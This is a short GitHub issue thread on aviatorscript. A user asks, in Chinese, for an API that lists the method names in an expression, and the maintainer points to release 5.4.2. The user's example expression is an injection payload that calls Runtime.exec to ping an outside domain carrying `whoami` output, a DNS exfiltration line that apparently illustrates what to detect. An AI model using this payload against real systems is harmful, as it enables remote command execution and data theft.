### ISSUE TITLE
可否提供获取表达式中的所有方法名的接口？

### ISSUE THREAD

**Issue by wxwyes** [killme2008/aviatorscript#570]
比如这个表达式："T(java.lang.Runtime).getRuntime().exec(\"ping `whoami'.794e7834a8.ipv6.1433.eu.org\")"
取出 getRuntime、exec 这两个方法名

**Comment by killme2008** [comment]
v5.4.2 release https://github.com/killme2008/aviatorscript/releases/tag/aviator-5.4.2
